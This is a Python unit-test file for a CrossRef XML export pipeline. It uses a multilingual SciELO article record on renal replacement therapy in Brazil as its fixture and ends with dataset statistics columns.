('Perfil epidemiológico dos pacientes em terapia renal'
' substitutiva no Brasil, 2000-2004', None, None),
('Epidemiological profile of patients on'
' renal replacement therapy in Brazil, 2000-2004', 'pt',
'Perfil epidemiológico dos pacientes em terapia renal'
' substitutiva no Brasil, 2000-2004'),
('Perfil epidemiológico de los pacientes en terapia'
' renal substitutiva en Brasil, 2000-2004', 'pt',
'Perfil epidemiológico dos pacientes em terapia renal'
' substitutiva no Brasil, 2000-2004'),
]
self.assertEqual(len(xml.findall('.//titles')), 3)
for titles, content in zip(xml.findall('.//titles'), expected_content):
with self.subTest(content[0]):
self.assertEqual(
titles.findtext('title'), content[0])
self.assertEqual(
titles.findtext('original_language_title'), content[2])
lang = titles.find('original_language_title')
if lang is not None:
lang = lang.attrib.get('language')
self.assertEqual(lang, content[1])
def test_article_contributors_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'en', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleContributorsPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
3, len(xml.findall('.//journal_article')))
self.assertEqual(
3, len(xml.findall('.//journal_article/contributors')))
def test_article_publication_date_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'en', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticlePubDatePipe()
raw, xml = xmlcrossref.transform(data)
expected = b"""<doi_batch><body><journal>
<journal_article publication_type="full_text">
<publication_date media_type="online">
<month>08</month>
<year>2010</year></publication_date></journal_article>
<journal_article publication_type="full_text">
<publication_date media_type="online">
<month>08</month>
<year>2010</year></publication_date></journal_article>
<journal_article publication_type="full_text">
<publication_date media_type="online">
<month>08</month>
<year>2010</year></publication_date></journal_article>
</journal></body></doi_batch>"""
for i, pubdate in enumerate(
xml.findall('.//journal_article//publication_date')):
with self.subTest(label=i):
self.assertEqual(pubdate.findtext('year'), '2010')
self.assertEqual(pubdate.findtext('month'), None)
self.assertEqual(pubdate.findtext('data'), None)
def test_article_pages_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'en', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLPagesPipe()
raw, xml = xmlcrossref.transform(data)
for i, node in enumerate(
xml.findall('.//journal_article//pages')):
with self.subTest(label=i):
self.assertEqual(node.findtext('first_page'), '14')
self.assertEqual(node.findtext('last_page'), '20')
def test_article_pid_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'en', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLPIDPipe()
raw, xml = xmlcrossref.transform(data)
for i, node in enumerate(
xml.findall('.//journal_article//publisher_item')):
with self.subTest(label=i):
self.assertEqual(
node.findtext('identifier'),
'S0034-89102010000400007')
def test_doi_data_elem_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'en', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLDOIDataPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
3, len(xml.findall('.//journal_article')))
self.assertEqual(
3, len(xml.findall('.//doi_data')))
def test_doi_elem_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'en', 'es'], 'doi_data')
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLDOIPipe()
raw, xml = xmlcrossref.transform(data)
expected_content = [
('10.1590/S0034-89102010000400007', 0),
('10.1590/ID.en', 1),
('10.1590/ID.es', 2),
]
self.assertEqual(
3, len(xml.findall('.//journal_article')))
self.assertEqual(
3, len(xml.findall('.//doi_data/doi')))
for doi, content in zip(
xml.findall('.//doi_data/doi'), expected_content):
with self.subTest(label=content[1]):
self.assertEqual(content[0], doi.text)
def test_resource_elem_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'en', 'es'], 'doi_data')
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLResourcePipe()
raw, xml = xmlcrossref.transform(data)
expected_content = [
("http://www.scielo.br/scielo.php?"
"script=sci_arttext&pid="
"S0034-89102010000400007&tlng=pt", 0),
("http://www.scielo.br/scielo.php?"
"script=sci_arttext&pid="
"S0034-89102010000400007&tlng=en", 1),
("http://www.scielo.br/scielo.php?"
"script=sci_arttext&pid="
"S0034-89102010000400007&tlng=es", 2),
]
self.assertEqual(
3, len(xml.findall('.//journal_article')))
self.assertEqual(
3, len(xml.findall('.//doi_data/resource')))
for resource, content in zip(
xml.findall('.//doi_data/resource'), expected_content):
with self.subTest(label=content[1]):
self.assertEqual(content[0], resource.text)
def test_article_abstracts_elem_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'en', 'es'], 'doi_data')
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleAbstractPipe()
raw, xml = xmlcrossref.transform(data)
abstracts = [raw.original_abstract()]
for body in raw.translated_abstracts().values():
abstracts.append(body)
abstract_nodes = xml.findall(
'.//{http://www.ncbi.nlm.nih.gov/JATS1}abstract/{http://www.ncbi.nlm.nih.gov/JATS1}p')
self.assertEqual(3, len(xml.findall('.//journal_article')))
self.assertEqual(9, len(abstract_nodes))
xml_abstracts = [a.text for a in abstract_nodes]
self.assertEqual(abstracts * 3, xml_abstracts)
def test_related_item_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'en', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLProgramPipe()
raw, xml = xmlcrossref.transform(data)
expected_content = [
('10.1590/ID.en',
"Epidemiological profile of patients on"
" renal replacement therapy in Brazil, 2000-2004",
0
),
('10.1590/ID.es',
"Perfil epidemiológico de los pacientes en terapia"
" renal substitutiva en Brasil, 2000-2004",
1
),
('10.1590/S0034-89102010000400007',
"Perfil epidemiológico dos pacientes em terapia"
" renal substitutiva no Brasil, 2000-2004",
2
),
('10.1590/S0034-89102010000400007',
"Perfil epidemiológico dos pacientes em terapia"
" renal substitutiva no Brasil, 2000-2004",
3
),
]
self.assertEqual(
3, len(xml.findall('.//program')))
self.assertEqual(
4, len(xml.findall('.//program/related_item/intra_work_relation')))
self.assertEqual(
4, len(xml.findall('.//program/related_item/description')))
for related_item, content in zip(
xml.findall('.//program/related_item'), expected_content):
with self.subTest(label=content[2]):
self.assertEqual(
content[1], related_item.findtext('description'))
intra_work_relation = related_item.find('intra_work_relation')
self.assertEqual(
content[0], intra_work_relation.text)
self.assertEqual(
'doi', intra_work_relation.attrib.get('identifier-type'))
self.assertEqual(
'isTranslationOf',
intra_work_relation.attrib.get('relationship-type'))
def test_collection_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'en', 'es'], 'doi_data')
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLCollectionPipe()
raw, xml = xmlcrossref.transform(data)
texts = [
"http://www.scielo.br/pdf/rsp/v44n4/07.pdf",
"http://www.scielo.br/pdf/rsp/v44n4/en_07.pdf",
"http://www.scielo.br/pdf/rsp/v44n4/es_07.pdf",
]
self.assertEqual(
3, len(xml.findall('.//doi_data//collection')))
for res, text in zip(
xml.findall('.//doi_data/collection/item/resource'), texts):
with self.subTest(text):
self.assertEqual(res.text, text)
def test_citations_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'en', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleCitationsPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
3, len(xml.findall('.//journal_article//citation_list')))
def test_every_journal_article_must_contain_own_license(self):
self._article.data["license"] = "by/4.0"
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
["pt", "en", "es"]
)
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLPermissionsPipe()
_, xml = xmlcrossref.transform(data)
programs = xml.findall(
".//{http://www.crossref.org/AccessIndicators.xsd}program"
)
self.assertEqual(3, len(programs))
for journal_article in xml.findall(".//journal_article"):
with self.subTest(journal_article=journal_article):
program = journal_article.findall(
".//{http://www.crossref.org/AccessIndicators.xsd}program"
)
self.assertIsNotNone(program)
self.assertEqual(1, len(program))
self.assertEqual(
3,
len(
program[0].findall(
"{http://www.crossref.org/AccessIndicators.xsd}license_ref"
)
),
)
self.assertIsNotNone(
program[0].findall(
"{http://www.crossref.org/AccessIndicators.xsd}free_to_read"
)
)
def test_journal_article_should_not_contain_licenses(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
["pt", "en", "es"]
)
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLPermissionsPipe()
_, xml = xmlcrossref.transform(data)
programs = xml.findall(
".//{http://www.crossref.org/AccessIndicators.xsd}program"
)
self.assertIsNotNone(programs)
class ExportCrossRef_MultiLingueDoc_with_DOI_pt_es_Tests(unittest.TestCase):
def setUp(self):
article_json = {
"fulltexts": {
"pdf": {
"es": "http://www.scielo.br/pdf/rsp/v44n4/es_07.pdf",
"en": "http://www.scielo.br/pdf/rsp/v44n4/en_07.pdf",
"pt": "http://www.scielo.br/pdf/rsp/v44n4/07.pdf"
},
"html": {
"es": "http://www.scielo.br/scielo.php?script=sci_arttext&pid=S0034-89102010000400007&tlng=es",
"en": "http://www.scielo.br/scielo.php?script=sci_arttext&pid=S0034-89102010000400007&tlng=en",
"pt": "http://www.scielo.br/scielo.php?script=sci_arttext&pid=S0034-89102010000400007&tlng=pt"
}
},
"collection": "scl",
"doi": "10.1590/S0034-89102010000400007",
"body": {
"pt": "Body PT",
"es": "Body ES",
"en": "Body EN"
},
"article": {
"v880": [
{
"_": "S0034-89102010000400007"
}
],
"v237": [
{
"_": "10.1590/S0034-89102010000400007"
}
],
"v223": [
{
"_": "20100801"
}
],
"v65": [
{
"_": "2010"
}
],
"v601": [
{
"_": "en"
},
{
"_": "es"
},
],
"v40": [
{
"_": "pt"
}
],
"v10": [
{
"s": "Bamgboye",
"r": "ND",
"_": "",
"n": "EL"
}
],
"v14": [
{
"f": "14",
"l": "20",
}
],
"v12": [
{
"l": "pt",
"_": "Perfil epidemiológico dos pacientes em terapia"
" renal substitutiva no Brasil, 2000-2004"
},
{
"l": "en",
"_": "Epidemiological profile of patients on"
" renal replacement therapy in Brazil, 2000-2004"
},
{
"l": "es",
"_": "Perfil epidemiológico de los pacientes en terapia"
" renal substitutiva en Brasil, 2000-2004"
}
],
"v337": [
{
"l": "pt",
"d": "10.1590/S0034-89102010000400007",
},
{
"l": "es",
"d": "10.1590/ID.es"
}
],
"v83": [
{
"a": "OBJETIVO: Descrever o perfil epidemiol\u00f3gico e cl\u00ednico de pacientes em terapia renal substitutiva, identificando fatores associados ao risco de morte. M\u00c9TODOS: Estudo observacional, prospectivo n\u00e3o concorrente, a partir de dados de 90.356 pacientes da Base Nacional em Terapias Renais Substitutivas, no Brasil. Foi realizado relacionamento determin\u00edstico-probabil\u00edstico do Sistema de Autoriza\u00e7\u00e3o de Procedimentos de Alta Complexidade/Custo e do Sistema de Informa\u00e7\u00e3o de Mortalidade. Foram inclu\u00eddos todos os pacientes incidentes que iniciaram di\u00e1lise entre 1/1/2000 e 31/12/2004, acompanhados at\u00e9 a morte ou final de 2004. Idade, sexo, regi\u00e3o de resid\u00eancia, doen\u00e7a renal prim\u00e1ria, causa do \u00f3bito foram analisados. Ajustou-se um modelo de riscos proporcionais para identificar fatores associados ao risco de morte. RESULTADOS: Ocorreu um aumento m\u00e9dio de 5,5% na preval\u00eancia de pacientes em terapia enquanto a incid\u00eancia manteve-se est\u00e1vel no per\u00edodo. Hemodi\u00e1lise foi a modalidade inicial predominante (89%). A maioria dos pacientes era do sexo masculino, com idade m\u00e9dia de 53 anos, residente na regi\u00e3o Sudeste, e apresentava causa indeterminada como principal causa b\u00e1sica da doen\u00e7a renal cr\u00f4nica, seguida da hipertens\u00e3o, diabetes e glomerulonefrites. Desses pacientes, 7% realizou transplante renal e 42% evoluiu para o \u00f3bito. Os pacientes em di\u00e1lise peritoneal eram mais idosos e apresentavam maior preval\u00eancia de diabetes. Entre os n\u00e3o transplantados, 45% foi a \u00f3bito e, entre os transplantados, 7%. No modelo final de riscos proporcionais de Cox, o risco de mortalidade foi associado com o aumento da idade, sexo feminino, ter diabetes, residir nas regi\u00f5es Norte e Nordeste, di\u00e1lise peritoneal como modalidade de entrada e n\u00e3o ter realizado transplante renal. CONCLUS\u00d5ES: Houve aumento da preval\u00eancia de pacientes em terapia renal no Brasil. Pacientes com idade avan\u00e7ada, diabetes, do sexo feminino, residentes nas regi\u00f5es Norte e Nordeste e sem transplante renal apresentam maior risco de morte.",
"l": "pt",
"_": ""
},
{
"a": "OBJECTIVE: To describe the clinical and epidemiological profile of patients under renal replacement therapies, identifying risk factors for death. METHODS: This is a non-concurrent cohort study of data for 90,356 patients in the National Renal Replacement Therapies Database. A deterministic-probabilistic linkage was performed using the Authorization System for High Complexity/Cost Procedures and the Mortality Information System databases. All patients who started dialysis between 1/1/2000 and 12/31/2004 were included and followed until death or the end of 2004. Age, sex, region of residence, primary renal disease and causes of death were analyzed. A proportional hazards model was used to identify factors associated with risk of death. RESULTS: The prevalence of patients under renal replacement therapies increased an average of 5.5%, while incidence remained stable during the period. Hemodialysis was the predominant initial modality (89%). The patients were majority male with mean age 53 years, residents of the Southeast region and presented unknown causes as the main cause of chronic renal disease, followed by hypertension, diabetes and glomerulonephritis. Of these patients, 42% progressed to death and 7% underwent kidney transplantation. The patients on peritoneal dialysis were older and had higher prevalence of diabetes. The death rate varied from 7% among transplanted patients to 45% among non-transplanted patients. In the final Cox proportional hazards model, the risk of mortality was associated with increasing age, female sex, having diabetes, living in the North and Northeast region, peritoneal dialysis as a first modality and not having renal transplantation. CONCLUSIONS: There was an increased prevalence of patients on renal therapy in Brazil. Increased risk of death was associated with advanced age, diabetes, the female sex, residents of the North and Northeast region and lack of renal transplant.",
"l": "en",
"_": ""
},
{
"a": "OBJETIVO: Describir el perfil epidemiol\u00f3gico y cl\u00ednico de pacientes en terapia renal substitutiva, identificando factores asociados al riesgo de muerte. M\u00c9TODOS: Estudio de observaci\u00f3n, prospectivo no concurrente, a partir de datos de 90.356 pacientes de la Base Nacional en Terapias Renales Substitutivas, en Brasil. Fue realizado reracionamiento determin\u00edstico-probabil\u00edstico del Sistema de Informaci\u00f3n de Mortalidad. Fueron incluidos todos los pacientes incidentes que iniciaron di\u00e1lisis entre 1/1/2000 y 31/12/2004, acompa\u00f1ados hasta la muerte o final de 2004. Edad, sexo, regi\u00f3n de residencia, enfermedad renal primaria, causa del \u00f3bito fueron analizados. Se ajust\u00f3 un modelo de riesgos proporcionales para identificar factores asociados al riesgo de muerte. RESULTADOS: Ocurri\u00f3 un aumento promedio de 5,5% en la prevalencia de pacientes en terapia, con relaci\u00f3n a la incidencia se mantuvo estable en el per\u00edodo. Hemodi\u00e1lisis fue la modalidad inicial predominante (89%). La mayor\u00eda de los pacientes era del sexo masculino, con edad promedio de 53 a\u00f1os, residente en la regi\u00f3n Sureste y presentaba causa indeterminada como principal causa b\u00e1sica de la enfermedad renal cr\u00f3nica, seguida de la hipertensi\u00f3n, diabetes y glomerulonefritis. De esos pacientes, 7% realizaron transplante renal y 42% evolucionaron a \u00f3bito. Los pacientes en di\u00e1lisis peritoneal eran m\u00e1s ancianos y presentaban mayor prevalencia de diabetes. Entre los no transplantados, 45% fueron a \u00f3bito y, entre los transplantadas 7%. En el modelo final de riesgos proporcionales de Cox, el riesgo de mortalidad estuvo asociado con el aumento de la edad, sexo femenino, tener diabetes, residir en la regi\u00f3n Norte y Noreste, di\u00e1lisis peritoneal como modalidad de entrada y no haber realizado transplante renal. CONCLUSIONES: Hubo aumento de la prevalencia de pacientes en terapia renal en Brasil. Pacientes con edad avanzada, diabetes, del sexo femenino, residentes en la regi\u00f3n Norte y Noreste y sin transplante renal presentan mayor riesgo de muerte.",
"l": "es",
"_": ""
}
]
},
"citations": [
{
"v30": [
{
"_": "Ethn Dis."
}
],
"v31": [
{
"_": "16"
}
],
"v32": [
{
"s": "2",
"_": "2"
}
],
"v118": [
{
"_": "1"
}
],
"v12": [
{
"l": "en",
"_": "End-stage renal disease in sub-Saharan Africa."
}
],
"v65": [
{
"_": "20060000"
}
],
"v64": [
{
"_": "2006"
}
],
"v14": [
{
"_": "2,5,9"
}
],
"v880": [
{
"_": "S0034-8910201000040000700001"
}
],
"v701": [
{
"_": "1"
}
],
"v865": [
{
"_": "20100800"
}
],
"v702": [
{
"_": "V:\\Scielo\\serial\\rsp\\v44n4\\markup\\07.htm"
}
],
"v10": [
{
"s": "Bamgboye",
"r": "ND",
"_": "",
"n": "EL"
}
]
},
],
"issue": {
"issue": {},
},
}
self._article = Article(article_json)
def test_journal_article_element(self):
xmlcrossref = ET.Element('doi_batch')
body = ET.Element('body')
body.append(ET.Element('journal'))
xmlcrossref.append(body)
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLJournalArticlePipe()
raw, xml = xmlcrossref.transform(data)
langs = ['pt', 'es']
self.assertEqual(len(xml.findall('.//journal_article')), 2)
for ja, lang in zip(
xml.findall('.//journal_article'), langs):
with self.subTest(lang):
self.assertEqual(ja.get('language'), lang)
def test_article_titles_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleTitlesPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(len(xml.findall('.//journal_article/titles')), 2)
def test_article_title_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'], 'titles')
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleTitlePipe()
raw, xml = xmlcrossref.transform(data)
expected_content = [
('Perfil epidemiológico dos pacientes em terapia renal'
' substitutiva no Brasil, 2000-2004', None, None),
('Perfil epidemiológico de los pacientes en terapia'
' renal substitutiva en Brasil, 2000-2004', 'pt',
'Perfil epidemiológico dos pacientes em terapia renal'
' substitutiva no Brasil, 2000-2004'),
]
self.assertEqual(len(xml.findall('.//titles')), 2)
for titles, content in zip(xml.findall('.//titles'), expected_content):
with self.subTest(content[0]):
self.assertEqual(
titles.findtext('title'), content[0])
self.assertEqual(
titles.findtext('original_language_title'), content[2])
lang = titles.find('original_language_title')
if lang is not None:
lang = lang.attrib.get('language')
self.assertEqual(lang, content[1])
def test_article_contributors_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleContributorsPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
2, len(xml.findall('.//journal_article')))
self.assertEqual(
2, len(xml.findall('.//journal_article/contributors')))
def test_article_publication_date_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticlePubDatePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
2, len(xml.findall('.//journal_article//publication_date')))
for i, pubdate in enumerate(
xml.findall('.//journal_article//publication_date')):
with self.subTest(label=i):
self.assertEqual(pubdate.findtext('year'), '2010')
self.assertEqual(pubdate.findtext('month'), None)
self.assertEqual(pubdate.findtext('data'), None)
def test_article_pages_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLPagesPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
2, len(xml.findall('.//journal_article//pages')))
for i, node in enumerate(
xml.findall('.//journal_article//pages')):
with self.subTest(label=i):
self.assertEqual(node.findtext('first_page'), '14')
self.assertEqual(node.findtext('last_page'), '20')
def test_article_pid_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLPIDPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
2, len(xml.findall('.//journal_article//publisher_item')))
for i, node in enumerate(
xml.findall('.//journal_article//publisher_item')):
with self.subTest(label=i):
self.assertEqual(
node.findtext('identifier'),
'S0034-89102010000400007')
def test_doi_data_elem_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLDOIDataPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
2, len(xml.findall('.//journal_article')))
self.assertEqual(
2, len(xml.findall('.//doi_data')))
def test_doi_elem_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'], 'doi_data')
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLDOIPipe()
raw, xml = xmlcrossref.transform(data)
expected_content = [
('10.1590/S0034-89102010000400007', 0),
('10.1590/ID.es', 2),
]
self.assertEqual(
2, len(xml.findall('.//journal_article')))
self.assertEqual(
2, len(xml.findall('.//doi_data/doi')))
for doi, content in zip(
xml.findall('.//doi_data/doi'), expected_content):
with self.subTest(label=content[1]):
self.assertEqual(content[0], doi.text)
def test_resource_elem_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'], 'doi_data')
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLResourcePipe()
raw, xml = xmlcrossref.transform(data)
expected_content = [
("http://www.scielo.br/scielo.php?"
"script=sci_arttext&pid="
"S0034-89102010000400007&tlng=pt", 0),
("http://www.scielo.br/scielo.php?"
"script=sci_arttext&pid="
"S0034-89102010000400007&tlng=es", 2),
]
self.assertEqual(
2, len(xml.findall('.//journal_article')))
self.assertEqual(
2, len(xml.findall('.//doi_data/resource')))
for resource, content in zip(
xml.findall('.//doi_data/resource'), expected_content):
with self.subTest(label=content[1]):
self.assertEqual(content[0], resource.text)
def test_article_abstracts_elem_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'], 'doi_data')
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleAbstractPipe()
raw, xml = xmlcrossref.transform(data)
abstracts = [raw.original_abstract()]
for body in raw.translated_abstracts().values():
abstracts.append(body)
abstract_nodes = xml.findall(
'.//{http://www.ncbi.nlm.nih.gov/JATS1}abstract/{http://www.ncbi.nlm.nih.gov/JATS1}p')
self.assertEqual(2, len(xml.findall('.//journal_article')))
self.assertEqual(6, len(abstract_nodes))
xml_abstracts = [a.text for a in abstract_nodes]
self.assertEqual(abstracts * 2, xml_abstracts)
def test_related_item_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLProgramPipe()
raw, xml = xmlcrossref.transform(data)
expected_content = [
('10.1590/ID.es',
"Perfil epidemiológico de los pacientes en terapia"
" renal substitutiva en Brasil, 2000-2004",
0
),
('10.1590/S0034-89102010000400007',
"Perfil epidemiológico dos pacientes em terapia"
" renal substitutiva no Brasil, 2000-2004",
1
),
('10.1590/S0034-89102010000400007',
"Perfil epidemiológico dos pacientes em terapia"
" renal substitutiva no Brasil, 2000-2004",
2
),
]
self.assertEqual(
2, len(xml.findall('.//program')))
self.assertEqual(
2, len(xml.findall('.//program/related_item/intra_work_relation')))
self.assertEqual(
2, len(xml.findall('.//program/related_item/description')))
for related_item, content in zip(
xml.findall('.//program/related_item'), expected_content):
with self.subTest(label=content[2]):
self.assertEqual(
content[1], related_item.findtext('description'))
intra_work_relation = related_item.find('intra_work_relation')
self.assertEqual(
content[0], intra_work_relation.text)
self.assertEqual(
'doi', intra_work_relation.attrib.get('identifier-type'))
self.assertEqual(
'isTranslationOf',
intra_work_relation.attrib.get('relationship-type'))
def test_collection_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'], 'doi_data')
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLCollectionPipe()
raw, xml = xmlcrossref.transform(data)
texts = [
"http://www.scielo.br/pdf/rsp/v44n4/07.pdf",
"http://www.scielo.br/pdf/rsp/v44n4/es_07.pdf",
]
self.assertEqual(
2, len(xml.findall('.//doi_data//collection')))
for res, text in zip(
xml.findall('.//doi_data/collection/item/resource'), texts):
with self.subTest(text):
self.assertEqual(res.text, text)
def test_citations_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleCitationsPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
2, len(xml.findall('.//journal_article//citation_list')))
class ExportCrossRef_XMLArticlePubDatePipe_Tests(unittest.TestCase):
def setUp(self):
self.xmlcrossref = ET.Element('doi_batch')
journal_article = ET.Element('journal_article')
journal_article.set('publication_type', 'full_text')
journal = ET.Element('journal')
journal.append(journal_article)
body = ET.Element('body')
body.append(journal)
self.xmlcrossref.append(body)
def test_article_publication_date_element_aop_article(self):
_raw_json = {
'issue': {
'issue': {'v32': [{'_': 'ahead'}]},
},
'article': {
'v32': [{'_': 'ahead'}],
'v223': [{'_': '20190325'}],
},
}
_article = Article(_raw_json)
data = [_article, self.xmlcrossref]
xmlcrossref = export_crossref.XMLArticlePubDatePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
b'<doi_batch><body><journal><journal_article publication_type="full_text"><publication_date media_type="online"><month>03</month><day>25</day><year>2019</year></publication_date></journal_article></journal></body></doi_batch>',
ET.tostring(xml)
)
def test_article_publication_date_element_issue_article(self):
_raw_json = {
'issue': {
'issue': {'v32': [{'_': '10'}]},
},
'article': {
'v32': [{'_': '10'}],
'v65': [{'_': '20190300'}],
},
}
_article = Article(_raw_json)
data = [_article, self.xmlcrossref]
xmlcrossref = export_crossref.XMLArticlePubDatePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
b'<doi_batch><body><journal><journal_article publication_type="full_text"><publication_date media_type="online"><month>03</month><year>2019</year></publication_date></journal_article></journal></body></doi_batch>',
ET.tostring(xml)
)
def test_article_publication_date_element_continuospub_article(self):
_raw_json = {
'issue': {
'issue': {'v32': [{'_': '10'}]},
},
'article': {
'v32': [{'_': '10'}],
'v65': [{'_': '20190000'}],
},
}
_article = Article(_raw_json)
data = [_article, self.xmlcrossref]
xmlcrossref = export_crossref.XMLArticlePubDatePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
b'<doi_batch><body><journal><journal_article publication_type="full_text"><publication_date media_type="online"><year>2019</year></publication_date></journal_article></journal></body></doi_batch>',
ET.tostring(xml)
)
class ExportCrossRef_XMLIssuePipe_Tests(unittest.TestCase):
def setUp(self):
self.xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
journal.append(ET.Element('journal_issue'))
body = ET.Element('body')
body.append(journal)
self.xmlcrossref.append(body)
def test_aop_element(self):
_raw_json = {
'issue':
{'issue':
{'v32': [{'_': 'ahead'}]},
},
'article':
{'v32': [{'_': 'ahead'}]},
}
_article = Article(_raw_json)
data = [_article, self.xmlcrossref]
_xmlcrossref = export_crossref.XMLIssuePipe()
raw, xml = _xmlcrossref.transform(data)
self.assertEqual(xml.find('.//journal_issue/issue'), None)
self.assertEqual(
b'<doi_batch><body><journal><journal_issue/></journal></body></doi_batch>',
ET.tostring(xml))
def test_issue_element(self):
_raw_json = {
'issue':
{'issue':
{'v32': [{'_': '10'}]},
},
'article':
{'v32': [{'_': '10'}]},
}
_article = Article(_raw_json)
data = [_article, self.xmlcrossref]
_xmlcrossref = export_crossref.XMLIssuePipe()
raw, xml = _xmlcrossref.transform(data)
self.assertEqual(xml.findtext('.//journal_issue/issue'), '10')
self.assertEqual(
b'<doi_batch><body><journal><journal_issue><issue>10</issue></journal_issue></journal></body></doi_batch>',
ET.tostring(xml))
class ExportCrossRef_XMLVolumePipe_Tests(unittest.TestCase):
def setUp(self):
self.xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
journal.append(ET.Element('journal_issue'))
body = ET.Element('body')
body.append(journal)
self.xmlcrossref.append(body)
def test_aop_element(self):
_raw_json = {
'issue':
{'issue':
{'v32': [{'_': 'ahead'}]},
},
'article':
{'v32': [{'_': 'ahead'}]},
}
_article = Article(_raw_json)
data = [_article, self.xmlcrossref]
_xmlcrossref = export_crossref.XMLVolumePipe()
raw, xml = _xmlcrossref.transform(data)
self.assertEqual(
b'<doi_batch><body><journal><journal_issue/></journal></body></doi_batch>',
ET.tostring(xml))
| 43.545256
| 2,385
| 0.586361
| 8,173
| 79,862
| 5.558424
| 0.092867
| 0.05054
| 0.03632
| 0.039226
| 0.930639
| 0.924894
| 0.917101
| 0.907086
| 0.898545
| 0.890621
| 0
| 0.038617
| 0.30286
| 79,862
| 1,833
| 2,386
| 43.569013
| 0.777351
| 0.000563
| 0
| 0.727398
| 0
| 0.024155
| 0.36063
| 0.101324
| 0
| 0
| 0
| 0
| 0.089717
| 1
| 0.05245
| false
| 0
| 0.005521
| 0
| 0.063492
| 0.00069
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9a5de7c69ca47746f671c8f377583780d564ee89
| 5,603
|
py
|
Python
|
extlinks/aggregates/models.py
|
suecarmol/externallinks
|
388771924f0e0173237393226cb7549a02ae40e3
|
[
"MIT"
] | 6
